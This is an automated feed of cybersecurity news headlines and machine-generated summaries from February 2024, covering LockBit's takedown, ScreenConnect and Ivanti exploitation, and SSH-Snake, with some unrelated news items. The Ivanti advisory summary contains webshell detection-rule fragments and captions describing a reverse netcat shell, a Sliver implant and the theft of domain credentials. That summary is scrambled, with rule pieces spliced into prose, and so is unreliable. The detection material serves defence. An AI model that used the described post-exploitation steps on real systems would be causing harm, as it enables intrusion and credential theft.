          Autosummary: “Given that confirmed attacks by LockBit over their 4 years in operation total well over 2,000, this suggests that their impact globally is in the region of multi-billions of dollars” - UK’s National Crime Agency. [Image: LockBit had $110+ million in 2,200 unspent bitcoins (source: NCA)] In mid-June 2023, America’s Cyber Defense Agency (CISA) said that LockBit was responsible for 1,700 ransomware attacks in the U.S. since 2020 and that the gang had extorted $91 million from victims.


          Prescription orders delayed as US pharmacies grapple with “nation-state” cyber attack

          government
          2024-02-23 https://www.bitdefender.com/blog/hotforsecurity/prescription-orders-delayed-as-us-pharmacies-grapple-with-nation-state-cyber-attack/
          Prescription orders across the United States are reportedly being delayed after a cyber attack impacted a healthcare technology firm that supplies services to pharmacies, including CVS Health. Read more in my article on the Hot for Security blog.



          Dormant PyPI Package Compromised to Spread Nova Sentinel Malware

          exploits
          2024-02-23 https://thehackernews.com/2024/02/dormant-pypi-package-compromised-to.html
          A dormant package available on the Python Package Index (PyPI) repository was updated after nearly two years to propagate an information stealer malware called Nova Sentinel. The package, named django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which detected an anomalous update to the library on February 21,



          230K individuals impacted by a data breach suffered by Telco provider Tangerine

          financial Telcos
          2024-02-23 https://securityaffairs.com/159528/data-breach/telco-provider-tangerine-data-breach.html
          Australian telecommunications provider Tangerine disclosed a data breach that exposed the personal information of roughly 230,000 individuals. The security breach occurred on Sunday 18 February 2024, but Tangerine management became aware of the incident on Tuesday 20 February 2024. The telco notified the Australian Cyber Security […]

          Autosummary: By Pierluigi Paganini, February 23, 2024. Australian telecommunications provider Tangerine disclosed a data breach that impacted roughly 230,000 individuals.


          SVR Cyber Actors Adapt Tactics for Initial Cloud Access

          industry
          2024-02-23 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a

          How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure

          OVERVIEW

          This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.

          The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.

          This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.


          PREVIOUS ACTOR ACTIVITY

          The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

          SVR actors are also known for:

          • The supply chain compromise of SolarWinds software.

          Autosummary: MITIGATION AND DETECTION: A number of mitigations will be useful in defending against the activity described in this advisory: Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises.


            Smashing Security podcast #360: Lockbit locked out, and funeral Facebook scams

            financial ransomware
            2024-02-22 https://grahamcluley.com/smashing-security-podcast-360/
            Heaven’s above! Scammers are exploiting online funerals, and Lockbit - the "Walmart of Ransomware" - is dismantled in style by cyber cops. All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

            Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Sponsored by: BlackBerry – BlackBerry helps keep you one step ahead.


            Attack velocity surges with average breakout time down to only 62 minutes

            government
            2024-02-22 https://www.helpnetsecurity.com/2024/02/22/stolen-credentials-exploit/

            The speed of cyberattacks continues to accelerate at an alarming rate, according to CrowdStrike. Adversaries increasingly exploit stolen credentials. The report indicates that the average breakout time is down to only 62 minutes from 84 in the previous year (with the fastest recorded attack coming in at 2 minutes and 7 seconds). Once initial access was obtained, it took only 31 seconds for an … More

            The post Attack velocity surges with average breakout time down to only 62 minutes appeared first on Help Net Security.



            Wire fraud scams escalate in real estate deals

            financial government
            2024-02-22 https://www.helpnetsecurity.com/2024/02/22/real-estate-fraud-video/

            In this Help Net Security video, Tyler Adams, CEO at CertifID, illustrates how the real estate sector needs to invest significant effort in educating consumers and implementing protective measures to safeguard real estate transactions. Recent CertifID research found that median consumer losses in real estate fraud schemes exceeded $70,000 per incident as a result of stolen buyer down payments and seller net proceeds. Also, 51% of consumers are not adequately aware of the risks of … More

            The post Wire fraud scams escalate in real estate deals appeared first on Help Net Security.



            Cybersecurity fears drive a return to on-premise infrastructure from cloud computing

            ciber
            2024-02-22 https://www.helpnetsecurity.com/2024/02/22/cloud-repatriation-projects-reasons/

            42% of organizations surveyed in the US are considering or already have moved at least half of their cloud-based workloads back to on-premises infrastructures, a phenomenon known as cloud repatriation, according to Citrix. The survey showed that 94% of respondents had been involved with a cloud repatriation project in the last three years. The most common reasons for cloud repatriation projects: unexpected security issues (41%) and high project expectations (29%) were reported as the top … More

            The post Cybersecurity fears drive a return to on-premise infrastructure from cloud computing appeared first on Help Net Security.


            Autosummary: After reflecting on their experience, IT leaders found that the most common reasons for cloud repatriation projects were security concerns, unexpected costs, performance issues, compatibility problems, and service downtime.


            U.S. Offers $15 Million Bounty to Hunt Down LockBit Ransomware Leaders

            exploits ransomware
            2024-02-22 https://thehackernews.com/2024/02/us-offers-15-million-bounty-to-hunt.html
            The U.S. State Department has announced monetary rewards of up to $15 million for information that could lead to the identification of key leaders within the LockBit ransomware group and the arrest of any individual participating in the operation. "Since January 2020, LockBit actors have executed over 2,000 attacks against victims in the United States, and around the world, causing costly

            Autosummary: "LockBit’s operation grew in scale by consistently delivering new product features, providing good customer support, and at times, marketing stunts that included paying people to tattoo themselves with the group’s logo," Intel 471 said.


            Attackers exploiting ConnectWise ScreenConnect flaws, fixes available for all users (CVE-2024-1709, CVE-2024-1708)

            exploits
            2024-02-22 https://www.helpnetsecurity.com/2024/02/22/cve-2024-1709-cve-2024-1708/

            The two ScreenConnect vulnerabilities ConnectWise has recently urged customers to patch have finally been assigned CVE numbers: CVE-2024-1709 for the authentication bypass, CVE-2024-1708 for the path traversal flaw. ConnectWise has also released a newer version of ScreenConnect (v23.9.10.8817), which contains the fixes for the two flaws and other non-security fixes but – more crucially – customers no longer under maintenance can upgrade to it to protect themselves against exploitation. Confirmed exploitation, PoC available ConnectWise shared … More

            The post Attackers exploiting ConnectWise ScreenConnect flaws, fixes available for all users (CVE-2024-1709, CVE-2024-1708) appeared first on Help Net Security.

            "

            Autosummary: "


            Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks

            ciber
            2024-02-22 https://thehackernews.com/2024/02/cybercriminals-weaponizing-open-source.html
            A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities. "SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network," Sysdig researcher Miguel Hernández said. "The worm automatically searches through known credential "

            Autosummary: " When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to "discover the attack paths that exist – and fix them. "


            Russian Government Software Backdoored to Deploy Konni RAT Malware

            exploits government rusia-ucrania
            2024-02-22 https://thehackernews.com/2024/02/russian-government-software-backdoored.html
An installer for a tool likely used by the Russian Consular Department of the Ministry of Foreign Affairs (MID) has been backdoored to deliver a remote access trojan called Konni RAT (aka UpDog). The findings come from German cybersecurity company DCSO, which linked the activity as originating from the Democratic People's Republic of Korea (DPRK)-nexus actors targeting Russia. The "

            Autosummary: The remote access trojan, which comes with capabilities for file transfers and command execution, is believed to have been put to use as early as 2014, and has also been utilized by other North Korean threat actors known as Kimsuky and ScarCruft (aka APT37). "


            LockBit ransomware secretly building next-gen encryptor before takedown

            exploits ransomware
            2024-02-22 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-secretly-building-next-gen-encryptor-before-takedown/
LockBit ransomware developers were secretly building a new version of their file encrypting malware, dubbed LockBit-NG-Dev - likely a future LockBit 4.0, when law enforcement took down the cybercriminal's infrastructure earlier this week. [...] "

            Autosummary: "


            Bitwarden’s new auto-fill option adds phishing resistance

            financial
            2024-02-22 https://www.bleepingcomputer.com/news/security/bitwardens-new-auto-fill-option-adds-phishing-resistance/
            The Bitwarden open-source password management service has introduced a new inline auto-fill menu that addresses the risk of user credentials being stolen through malicious form fields. [...] "

            Autosummary: "


            ScreenConnect servers hacked in LockBit ransomware attacks

            exploits ransomware
            2024-02-22 https://www.bleepingcomputer.com/news/security/screenconnect-servers-hacked-in-lockbit-ransomware-attacks/
            Attackers are exploiting a maximum severity authentication bypass vulnerability to breach unpatched ScreenConnect servers and deploy LockBit ransomware payloads on compromised networks. [...] "

            Autosummary: "In the last 24 hours, we"ve observed several LockBit attacks, apparently after exploitation of the recent ConnectWise ScreenConnect vulnerabilities (CVE-2024-1708 / CVE-2024-1709)," the Sophos" threat response task force said. "


            Why ransomware gangs love using RMM tools—and how to stop them

            exploits ransomware
            2024-02-22 https://www.malwarebytes.com/blog/business/2024/02/why-ransomware-gangs-love-using-rmm-tools-and-how-to-stop-them
            More and more ransomware gangs are using RMM tools in their attacks. "

            Autosummary: Ransomware gangs exploit Remote Monitoring and Management (RMM) tools through one of three main strategies: Gaining initial access via preexisting RMM tools: As RMM tools typically require credentials for system access, attackers can exploit weak or default RMM credentials and vulnerabilities to gain unauthorized access to a network. In this post, we will delve into how ransomware gangs use RMM tools, identify the most exploited RMM tools, and discuss how to detect and prevent suspicious RMM tool activity using Application Block and Endpoint Detection and Response (EDR). Whether using RMM tools for initial access, post-infection ransomware deployment, or a combination of the two, ransomware attackers are upping the sophistication of their attacks. "


            Bring us the head of LockBit! $15 million bounty offered for information on leaders of notorious ransomware gang

            exploits ransomware
            2024-02-22 https://www.tripwire.com/state-of-security/bring-us-head-lockbit-15-million-bounty-offered-information-leaders-notorious
            A huge reward is being offered for information leading to the identification or location of any of the leaders of the LockBit ransomware gang. Read more in my article on the Tripwire State of Security blog. "

            Autosummary: "


            “Beyond the border scam”, pay attention to the instance of the new Nigerian fraud

            financial
            2024-02-22 https://securityaffairs.com/159491/cyber-crime/beyond-the-border-scam-nigerian-fraud.html
            Security researcher Salvatore Lombardo shared details about a new instance of Nigerian fraud that he called ‘Beyond the border scam.’ The 419 scam is a form of scam that requires the recipient to pay an upfront sum to receive a much larger reward later. The name derives from article 419 of the Nigerian penal code which punishes […] "

Autosummary: Lavish compensation and conditions. In this dramatic scenario here is the real request: “The bank manager, due to my refugee status, advised me to find a partner or representative anywhere in the world who will take care of me and receive the money on my behalf […]”, obviously for a generous fee: “Please, I really need your kind-hearted help and I am willing to offer you a part of the money if you help me.” Therefore pay attention to the typical scheme: the scam begins with an email received from an alleged widow in difficulty asking for help in receiving the inheritance of her husband who died in the war, in exchange for a large fee; once responded, other emails will arrive, with other information and the intermediation of a bank and refugee official; finally, personal details and financial support will be requested, as well as all instructions to prepare the necessary documentation for the transfer of the fund, to be paid to an account of a refugee agency. "


            Critics say Final Fantasy Rebirth a stunning sequel

            industry
            2024-02-22 https://www.bbc.co.uk/news/newsbeat-68368620
Reviews of the highly anticipated follow-up to 2020's Remake praise its open world and story. "

            Autosummary: "


            New ScreenConnect RCE flaw exploited in ransomware attacks

            exploits ransomware
            2024-02-22 https://www.bleepingcomputer.com/news/security/new-screenconnect-rce-flaw-exploited-in-ransomware-attacks/
            Attackers are exploiting a maximum severity authentication bypass vulnerability to breach unpatched ScreenConnect servers and deploy LockBit ransomware payloads on compromised networks. [...] "

            Autosummary: "On February 22, 2024, Sophos X-Ops reported through our social media handle that despite the recent law enforcement activity against the LockBit threat actor group we had observed several attacks over the preceding 24 hours that appeared to be carried out with LockBit ransomware, built using a leaked malware builder tool," Sophos explained. "


            10 cybersecurity startups to watch in 2024

            ciber
            2024-02-21 https://www.helpnetsecurity.com/2024/02/21/cybersecurity-startups-watch-2024/

            At Help Net Security, we’ve been following the cybersecurity business landscape closely for the past 25 years. Through our Industry News section, we’ve been tracking the pulse of the cybersecurity world, bringing you product news from companies worldwide. Certain vendors have consistently managed to capture our attention. We decided to spotlight companies breaking new ground, attracting top talent, and leading innovation in key areas. We are focusing on those who are not just responding to … More

            The post 10 cybersecurity startups to watch in 2024 appeared first on Help Net Security.

            "

Autosummary: Funding: In October 2023, Lakera raised $10 million in a funding round led by Redalpine. Additional funders, like Inovia Capital and Fly Ventures, and industry expert angels, including the co-founders of Snyk and executives from Datadog, Hybris, and Palo Alto Networks, also participated. Israel, CEO: Shahar Ben-Hador. Radiant Security, founded by experts from Imperva and Exabeam, provides an AI-driven co-pilot for Security Operations Centers, enhancing analyst efficiency, detecting more attacks, and significantly reducing response times. Cybersecurity leaders Michael Sutton, Thomas ‘Halvar Flake’ Dullien, Jamie Butler, Ryan Permeh, Bryson Bort, Pedram Amini, Chris Ueland, and David Mandel from Emerging Ventures also joined as investors. "


            A closer look at Israeli cybersecurity funding and M&A activity in 2023

            ciber
            2024-02-21 https://www.helpnetsecurity.com/2024/02/21/israeli-cybersecurity-funding-2023-video/

            Last year was challenging for the global market, and the market downturn greatly affected even the historically resilient cybersecurity ecosystem. In this Help Net Security video, Merav Ben Avi, Content Manager at YL Ventures, talks about how the Israeli cybersecurity industry, much like the global one, skyrocketed in 2021 with record-breaking capital and an exceptional number of new startups and unicorns. However, the market slowdown in 2022, economic instability in 2023, and geopolitical unrest in … More

            The post A closer look at Israeli cybersecurity funding and M&A activity in 2023 appeared first on Help Net Security.

            "

            Autosummary: "


            Russian Hackers Target Ukraine with Disinformation and Credential-Harvesting Attacks

            rusia-ucrania
            2024-02-21 https://thehackernews.com/2024/02/russian-hackers-target-ukraine-with.html
            Cybersecurity researchers have unearthed a new influence operation targeting Ukraine that leverages spam emails to propagate war-related disinformation. The activity has been linked to Russia-aligned threat actors by Slovak cybersecurity company ESET, which also identified a spear-phishing campaign aimed at a Ukrainian defense company in October 2023 and a European Union agency in November 2023 "

            Autosummary: Operation Texonto, as the entire campaign has been codenamed, has not been attributed to a specific threat actor, although some elements of it, particularly the spear-phishing attacks, overlap with COLDRIVER, which has a history of harvesting credentials via bogus sign-in pages. "


            Beef trade risks key Brazil ecosystem - campaigners

            latam
            2024-02-21 https://www.bbc.co.uk/news/science-environment-68272643
Investigation by Global Witness suggests cattle farming is driving illegal deforestation in the savannah featured in BBC's Planet Earth III. "

            Autosummary: "


            Cybersecurity for Healthcare—Diagnosing the Threat Landscape and Prescribing Solutions for Recovery

            ciber
            2024-02-21 https://thehackernews.com/2024/02/cybersecurity-for-healthcarediagnosing.html
            On Thanksgiving Day 2023, while many Americans were celebrating, hospitals across the U.S. were doing quite the opposite. Systems were failing. Ambulances were diverted. Care was impaired. Hospitals in three states were hit by a ransomware attack, and in that moment, the real-world repercussions came to light—it wasn’t just computer networks that were brought to a halt, but actual patient "

Autosummary: By coupling advanced technology with human-led analysis, a managed EDR performs critical cybersecurity tasks on your behalf, namely: monitoring and collecting endpoint data; detecting and investigating threats; triaging alerts; providing actionable remediation steps, including one-click solutions. Easy to deploy, Huntress Managed EDR is fully managed and monitored by a 24/7 Security Operations Center. Small- to mid-sized healthcare organizations have, unfortunately, become vulnerable targets from which cybercriminals can easily steal sensitive data, extort heavy ransoms, and, worst of all, diminish critical patient care. This entails creating layers to your defenses with solutions such as intrusion prevention, data encryption, threat detection, patch management, and more. Building a thorough defense infrastructure, however, requires sizable capital, resources, and expertise. However, this level of care demands more avenues to access data, specifically via tablets, laptops, and mobile devices. However, according to the report, The State of Cybersecurity for Mid-Sized Businesses in 2023, Huntress discovered over 60% of respondents didn't have any dedicated cybersecurity experts on staff. "


            Honduran ex-leader accused of leading narco-state

            government
            2024-02-21 https://www.bbc.co.uk/news/world-latin-america-68358704
            Juan Orlando Hernández, who is accused of protecting drug traffickers, is on trial in New York. "

            Autosummary: "


            Sunset video shows Mexico volcano spewing ash

            latam
            2024-02-21 https://www.bbc.co.uk/news/world-latin-america-68358476
            A yellow alert for areas close to the volcano is currently in place, according to local media. "

            Autosummary: "


            US govt shares cyberattack defense tips for water utilities

            ciber
            2024-02-21 https://www.bleepingcomputer.com/news/security/us-govt-shares-cyberattack-defense-tips-for-water-utilities/
            CISA, the FBI, and the Environmental Protection Agency (EPA) shared a list of defense measures U.S. water utilities should implement to better defend their systems against cyberattacks [...] "

            Autosummary: "


            ScreenConnect critical bug now under attack as exploit code emerges

            exploits
            2024-02-21 https://www.bleepingcomputer.com/news/security/screenconnect-critical-bug-now-under-attack-as-exploit-code-emerges/
            Both technical details and proof-of-concept exploits are available for the two vulnerabilities ConnectWise disclosed earlier this week for ScreenConnect, its remote desktop and access software. [...] "

Autosummary: The flaw was located by noticing code changes on the "ScreenConnect.Core.dll" file, pointing to ZipSlip, a vulnerability that occurs when applications don't properly sanitize the file extraction path, which could result in overwriting sensitive files. "


            US offers $15 million bounty for info on LockBit ransomware gang

            exploits ransomware
            2024-02-21 https://www.bleepingcomputer.com/news/security/us-offers-15-million-bounty-for-info-on-lockbit-ransomware-gang/
            The U.S. State Department is now also offering rewards of up to $15 million to anyone who can provide information about LockBit ransomware gang members and their associates. [...] "

            Autosummary: U.S. State Department Secure Drop page (BleepingComputer) "The Department of State is announcing reward offers totaling up to $15 million for information leading to the arrest and/or conviction of any individual participating in a LockBit ransomware variant attack and for information leading to the identification and/or location of any key leaders of the LockBit ransomware group," U.S. State Department Spokesperson Matthew Miller said today. "


            Apple’s iMessage gains industry-leading quantum security

            industry
            2024-02-21 https://www.computerworld.com/article/3713081/apples-imessage-gains-industry-leading-quantum-security.html#tk.rss_security

Apple is preparing for future threats to iMessage by introducing upgraded encryption for its messaging service that is designed to withstand attacks from quantum computers.

Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple's messaging system being more secure against both current and future foes.

            What is the protection?

            Announced on Apple’s Security Research blog, the new iMessage protection is called PQ3 and promises the “strongest security properties of any at-scale messaging protocol in the world.”


            "

Autosummary: In this case, Apple’s security teams asked themselves what might happen if hackers, criminals, or state-backed rogue surveillance firms gathered vast quantities of encrypted iMessage data today in order to break that encryption using quantum computers tomorrow. Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple's messaging system being more secure against both current and future foes. Apple has submitted PQ3 to two leading security researchers who have verified the technology — Professor David Basin of the Information Security Group at ETH in Zurich, Switzerland, and Douglas Stebila, a University of Waterloo Professor. "


            New Wi-Fi Vulnerabilities Expose Android and Linux Devices to Hackers

            Linux
            2024-02-21 https://thehackernews.com/2024/02/new-wi-fi-vulnerabilities-expose.html
            Cybersecurity researchers have identified two authentication bypass flaws in open-source Wi-Fi software found in Android, Linux, and ChromeOS devices that could trick users into joining a malicious clone of a legitimate network or allow an attacker to join a trusted network without a password. The vulnerabilities, tracked as CVE-2023-52160 and CVE-2023-52161, have been discovered following a "

            Autosummary: Major Linux distributions such as Debian (1, 2), Red Hat (1), SUSE (1, 2), and Ubuntu (1, 2) have released advisories for the two flaws. "


            Hackers abuse Google Cloud Run in massive banking trojan campaign

            financial exploits
            2024-02-21 https://www.bleepingcomputer.com/news/security/hackers-abuse-google-cloud-run-in-massive-banking-trojan-campaign/
            Security researchers are warning of hackers abusing the Google Cloud Run service to distribute massive volumes of banking trojans like Astaroth, Mekotio, and Ousaban. [...] "

Autosummary: Volume of phishing emails linking to Google Cloud Run (Cisco). Attack chain: The attacks start with phishing emails to potential victims, crafted to appear as legitimate communications for invoices, financial statements, or messages from local government and tax agencies. "


            Fraudsters tried to scam Apple out of 5,000 iPhones worth over $3 million

            financial
            2024-02-21 https://www.bleepingcomputer.com/news/security/fraudsters-tried-to-scam-apple-out-of-5-000-iphones-worth-over-3-million/
            Two Chinese nationals face 20 years in prison after being caught and convicted of submitting over 5,000 fake iPhones worth more than $3 million to Apple with the goal of having them replaced with genuine devices. [...] "

            Autosummary: "


            New SSH-Snake malware steals SSH keys to spread across the network

            exploits
            2024-02-21 https://www.bleepingcomputer.com/news/security/new-ssh-snake-malware-steals-ssh-keys-to-spread-across-the-network/
            A threat actor is using an open-source network mapping tool named SSH-Snake to look for private keys undetected and move laterally on the victim infrastructure. [...] "

            Autosummary: "By avoiding the easily detectable patterns associated with scripted attacks, this new tool provides greater stealth, flexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being more efficient and successful" - Sysdig Released on January 4, 2024, SSH-Snake is a bash shell script tasked with autonomously searching a breached system for SSH credentials and utilizing them for propagation. "


            US GOV OFFERS A REWARD OF UP TO $15M FOR INFO ON LOCKBIT GANG MEMBERS AND AFFILIATES

            ransomware
            2024-02-21 https://securityaffairs.com/159454/cyber-crime/lockbit-members-reward.html
            U.S. government offers rewards of up to $15 million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates. The U.S. Department of State is offering a reward of up to $15 million for information leading to the identification or location of members of the Lockbit ransomware gang and […] "

Autosummary: Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. "


            Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways

            exploits
            2024-02-21 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b

            SUMMARY

            The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations:

            • Federal Bureau of Investigation (FBI)
            • Multi-State Information Sharing & Analysis Center (MS-ISAC)
            • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
            • United Kingdom National Cyber Security Centre (NCSC-UK)
            • Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment
            • New Zealand National Cyber Security Centre (NCSC-NZ)
            • CERT-New Zealand (CERT NZ)

            Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.

            Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.

            During multiple incident response "

            Autosummary: " hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2" os = "linux" os_arch = "all" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:05Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 9995 version = 4 strings: $s = "eval{my $c=Crypt::RC4->new(" condition: $s } rule apt_webshell_aspx_glasstoken: UTA0178 { meta: author = "threatintel@volexity.com" date = "2023-12-12" description = "Detection for a custom webshell seen on external facing server." hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb" os = "all" os_arch = "all" reference = "https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py" report = "TIB-20240109" scan_context = "file,memory" last_modified = "2024-01-09T13:45Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 10065 version = 3 strings: $s1 = "proxy_loop" ascii $s2 = "connect_to_dst" ascii $s3 = "request_client" ascii $s4 = "subnegotiation_client" ascii $s5 = "bind_port" ascii condition: all of them } Below is proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration: Figure 1: Ivanti Domain Join Configuration with “Save Credentials”​​​​​ Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection Figure 3: Upgrade Netcat Connection to Sliver Implant Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials Below is a demonstration of the capacity for post exploitation exfiltration of base64 encoded cleartext credentials for active directory users and their associated NTLM password hashes: Figure 5: Configuration of User Realm Figure 6: User Realm Configuration to Domain Figure 7: Configuration of User Realm Mapping Figure 8: Login as 
“vpnuser1” to Establish an Active Session Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Perl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User Figure 10: Decode base64 Encoded Blob to Display User’s Plaintext Credentials Figure 11: Using Mimikatz Validate NTLM Password Hash Obtained in Figure 10 Matches Active Directory User Credential Hash Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mb Database Files Containing Credentials for Active and Inactive Sessions Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials from LMDB-Backup Database Files Figure 17: Decode Credentials from LMDB-Backup Database Files Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files APPENDIX B: INDICATORS OF COMPROMISE Table 1: Ivanti Connect Secure VPN Indicators of Compromise Filename Description Purpose /home/perl/DSLogConfig.pm" hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988" os = "win" os_arch = "all" reference = "https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.aspx" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:04Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 410 version = 7 strings: $a1 = "every office needs a tool like Georg" ascii $a2 = "cmd = Request." 
hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d" os = "win" os_arch = "all" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:08Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 9994 version = 5 strings: $s1 = "=Convert.FromBase64String(System.GetString(" ascii $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/ condition: for any i in (0..#s1): ( $re in (@s1[i]..@s1[i]+512) ) } rule webshell_aspx_regeorg { meta: author = "threatintel@volexity.com" date = "2018-08-29" description = "Detects the reGeorg webshell based on common strings in the webshell.ToString());" ascii condition: any of ($a*) or $proxy1 or all of ($proxy_b*) } rule hacktool_py_pysoxy { meta: author = "threatintel@volexity.com" date = "2024-01-09" description = "SOCKS5 proxy tool used to relay connections. United Kingdom National Cyber Security Centre (NCSC-UK) Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment New Zealand National Cyber Security Centre (NCSC-NZ) CERT-New Zealand (CERT NZ) Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.UTA0178 { meta: author = "threatintel@volexity.com" date = "2023-12-13" description = "Detection for the COMPLYSHELL webshell. Download the PDF version of this report: Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (PDF, 2.20 MB ) For a downloadable copy of IOCs, see: TECHNICAL DETAILS This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. 
The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials as shown in Figure 4, APPENDIX A. Users who currently have active sessions to the appliance could have their base64 encoded active directory cleartext passwords, in addition to the New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in Figure 10, APPENDIX A.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and authoring organizations. The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.Following the actors’ developments, Ivanti disclosed three additional vulnerabilities: CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA that allows an attacker to access restricted resources without authentication.When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. "


LockBit, the world’s worst ransomware, is down

            exploits ransomware
            2024-02-20 https://www.malwarebytes.com/blog/cybercrime/2024/02/lockbit-the-worlds-worst-ransomware-is-down
            LockBit’s position as ransomware’s biggest beast is suddenly in doubt. "

            Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. [Chart: Top 5 ransomware gangs by known attacks, February 2023 – January 2024] At this stage we have no idea how serious the damage to LockBit is, and law enforcement is only claiming that the group has been “disrupted”. "


            Clean links and sophisticated scams mark new era in email attacks

            financial
            2024-02-20 https://www.helpnetsecurity.com/2024/02/20/eml-attachments/

